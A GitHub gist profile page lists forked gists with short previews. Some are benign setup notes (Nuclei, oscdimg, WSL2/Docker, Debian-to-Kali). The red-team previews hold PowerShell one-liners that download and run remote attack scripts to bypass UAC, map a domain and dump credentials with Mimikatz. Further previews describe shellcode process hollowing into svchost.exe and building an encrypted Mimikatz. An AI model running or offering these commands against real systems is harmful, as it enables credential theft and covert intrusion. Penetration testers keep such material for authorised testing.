Skip to content

Instantly share code, notes, and snippets.

View AssassinUKG's full-sized avatar
🎯
Focusing, Training

ac1d AssassinUKG

🎯
Focusing, Training
View GitHub Profile
@AssassinUKG
AssassinUKG / Nuclei.md
Created March 26, 2025 21:55 — forked from E1A/Nuclei.md
Full Nuclei cheatsheet and explanation

Intro

”Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on a large number of hosts. Nuclei offers scanning for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks.”


FAQ

  • Q: What is nuclei?
  • A: Nuclei is a fast and customizable vulnerability scanner based on simple YAML-based templates.
@AssassinUKG
AssassinUKG / OSCDIMG_notes
Created November 20, 2024 23:21 — forked from rpc180/OSCDIMG_notes
Using oscdimg.exe to create a bootable Windows ISO with updated contents
# oscdimg.exe is installed along with Microsoft Windows 10 Deployment Toolkit
# located in "C:\Program Files (x86)\Windows Kits\10\Aessessment and Deployment Kit\Deployment Tools"
# Copy executable and etfsboot.com and efisys.bin to same folder as executable so it can resolve
# agrument locations are relative paths, does not seem to support absolute path from root
# 2#p0 stuff is not a typo.
oscdimg.exe -m -o -u2 -udfver102 -bootdata:2#p0,e,betfsboot.com#pEF,e,befisys.bin Win10_source\subfolder unattend_Win10Ent1607x64.iso
oscdimg.exe -m -o -u2 -udfver102 -bootdata:2#p0,e,bd:\workingmount\boot\etfsboot.com#pEF,e,bd:\workingmount\efi\microsoft\boot\efisys.bin d:\workingmount d:\support\Server2016_Test.iso
@AssassinUKG
AssassinUKG / no_strings.hpp
Created October 24, 2024 12:37 — forked from EvanMcBroom/no_strings.hpp
Encrypt Strings at Compile Time
// Copyright (C) 2022 Evan McBroom
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
@AssassinUKG
AssassinUKG / docker-wsl2.md
Created September 24, 2024 14:52 — forked from martinsam16/docker-wsl2.md
How to install wsl2 ubuntu + docker + docker-compose

Activate wsl2

dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
dism.exe /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
wsl --set-default-version 2

Install and Configure Ubuntu

@AssassinUKG
AssassinUKG / makekali.sh
Created August 29, 2024 18:37 — forked from warecrash/makekali.sh
Convert Debian to Kali
apt update
apt -y install wget gnupg dirmngr
wget -q -O - https://archive.kali.org/archive-key.asc | gpg --import
gpg --keyserver hkp://keys.gnupg.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list
gpg -a --export ED444FF07D8D0BF6 | sudo apt-key add -
apt update
apt -y upgrade
apt -y dist-upgrade
apt -y autoremove --purge
@AssassinUKG
AssassinUKG / RedTeam_CheatSheet.ps1
Created August 18, 2024 20:39 — forked from MHaggis/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@AssassinUKG
AssassinUKG / DynWin32-ShellcodeProcessHollowing.ps1
Created July 17, 2024 14:29 — forked from qtc-de/DynWin32-ShellcodeProcessHollowing.ps1
PowerShell implementation of shellcode based Process Hollowing that only relies on dynamically resolved Win32 API functions
<#
DynWin32-ShellcodeProcessHollowing.ps1 performs shellcode based process hollowing using
dynamically looked up Win32 API calls. The script obtains the methods GetModuleHandle,
GetProcAddress and CreateProcess by using reflection. Afterwards it utilizes GetModuleHandle
and GetProcAddress to obtain the addresses of the other required Win32 API calls.
When all required Win32 API calls are looked up, it starts svchost.exe in a suspended state
and overwrites the entrypoint with the specified shellcode. Afterwards, the thread is resumed
and the shellcode is executed enveloped within the trusted svchost.exe process.
@AssassinUKG
AssassinUKG / gist:f6061886ec409f0210c986ca480d5442
Created March 7, 2024 20:58 — forked from thesubtlety/gist:5d30bc04f087807d817cf4479a481c23
Download compile and encrypt the latest mimikatz
#requires -version 2
<#
Author: Noah
@subTee's reflexive loader
Required Dependencies: msbuild, csc
Execute: Run-UpdateKatz -Verbose
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@AssassinUKG
AssassinUKG / main.cpp
Created January 31, 2024 11:56 — forked from hasherezade/main.cpp
Get PEB64 from a WOW64 process
#include <Windows.h>
#include <iostream>
#include "ntdll_undoc.h"
PPEB get_default_peb()
{
#if defined(_WIN64)
return (PPEB)__readgsqword(0x60);
#else